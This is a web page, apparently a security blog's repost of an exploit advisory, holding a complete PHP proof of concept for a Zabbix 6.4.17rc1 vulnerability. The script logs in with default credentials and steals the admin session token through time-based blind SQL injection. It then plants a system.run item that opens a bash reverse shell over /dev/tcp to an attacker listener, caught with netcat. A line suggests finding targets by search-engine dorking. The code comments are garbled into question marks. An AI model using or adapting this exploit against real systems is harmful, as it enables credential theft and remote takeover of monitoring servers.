Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

Zabbix 6.4.17rc1 Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 47
=============================================================================================================================================
| # Title : Zabbix server =============================================================================================================================================
| # Title : Zabbix server v 6.4.17rc1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.zabbix.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description:

The following code exploits the CVE-2024-42327 vulnerability, performs identity verification,
leaks the API token, and then sends code to reverse the shell

[+] save code as poc.php .

[+] Set Target : line 141

[+] USage : C:\www>php 2.php

[+] PayLoad :

<?php
// ???????? ????????
$headers = [
"Content-Type: application/json",
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
];

function zabbixAuthenticate($url, $username, $password)
{
$data = json_encode([
"jsonrpc" => "2.0",
"method" => "user.login",
"params" => [
"username" => $username,
"password" => $password
],
"id" => 1
]);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

$responseJson = json_decode($response, true);
if (isset($responseJson['result'])) {
echo "[+] ?? ????? ?????? ?????! ?????? API: " . $responseJson['result'] . "\n";
return $responseJson['result'];
} else {
echo "[-] ??? ????? ??????. ?????????: " . $response . "\n";
exit();
}
}

function sendInjection($url, $authToken, $position, $char, $sleepTime, $row)
{
$data = json_encode([
"jsonrpc" => "2.0",
"method" => "user.get",
"params" => [
"output" => ["userid", "username"],
"selectRole" => [
"roleid",
"name AND (SELECT * FROM (SELECT(SLEEP($sleepTime - (IF(ORD(MID((SELECT sessionid FROM zabbix.sessions WHERE userid=1 and status=0 LIMIT $row,1), $position, 1))=" . ord($char) . ", 0, $sleepTime)))))BEEF)"
],
"editable" => 1,
],
"auth" => $authToken,
"id" => 1
]);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

return $response;
}

function extractApiToken($url, $authToken, $position, $charset, $sleepTime)
{
foreach (str_split($charset) as $char) {
$response = sendInjection($url, $authToken, $position, $char, $sleepTime, 0);
$responseTime = substr($response, -5); // ?????? ??????? ?? ???????
if ($sleepTime < $responseTime && $responseTime < $sleepTime + 0.5) {
return $char;
}
}
return null;
}

function getHostIds($url, $apiTokenAdmin)
{
$data = json_encode([
"jsonrpc" => "2.0",
"method" => "host.get",
"params" => [
"output" => ["hostid", "host"],
"selectInterfaces" => ["interfaceid"]
],
"auth" => $apiTokenAdmin,
"id" => 1
]);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

$responseJson = json_decode($response, true);
if (isset($responseJson['result'][0])) {
$hostId = $responseJson['result'][0]['hostid'];
$interfaceId = $responseJson['result'][0]['interfaces'][0]['interfaceid'];
return [$hostId, $interfaceId];
} else {
echo "[-] ?? ??? ?????? ??? ????? ?? ?????????.\n";
return [null, null];
}
}

function sendReverseShellRequest($url, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort)
{
$data = json_encode([
"jsonrpc" => "2.0",
"method" => "item.create",
"params" => [
"name" => "rce",
"key_" => "system.run[bash -c \"bash -i >& /dev/tcp/$listenIp/$listenPort 0>&1\"]",
"delay" => 1,
"hostid" => $hostId,
"type" => 0,
"value_type" => 1,
"interfaceid" => $interfaceId,
],
"auth" => $apiTokenAdmin,
"id" => 1
]);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_exec($ch);
curl_close($ch);
}

$zabbixUrl = "http://example.com/api_jsonrpc.php";
$username = "admin";
$password = "admin";
$listenIp = "tun0";
$listenPort = 4444;
$threads = 10;
$sleepTime = 1;
$row = 0;
$length = 32;
$charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
$proxy = null; // ?????? NULL ??? ?? ??? ???? ????

// ??? ???????
$apiToken = zabbixAuthenticate($zabbixUrl, $username, $password);

$apiTokenAdmin = '';
for ($position = 0; $position < $length; $position++) {
$char = extractApiToken($zabbixUrl, $apiToken, $position, $charset, $sleepTime);
if ($char !== null) {
$apiTokenAdmin .= $char;
echo "\r[*] ??????? ?????? API ???????: " . $apiTokenAdmin;
flush();
}
}

echo "\n[*] ?????? ??? ??????? ??????? ...\n";
list($hostId, $interfaceId) = getHostIds($zabbixUrl, $apiTokenAdmin);

if ($hostId && $interfaceId) {
echo "[*] ??? ???????? ?????? ??? reverse shell ...\n";
sendReverseShellRequest($zabbixUrl, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort);
shell_exec("nc -lnvp $listenPort");
} else {
echo "[-] ??? ?????? ??? ????? ?????? ?? ???????.\n";
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================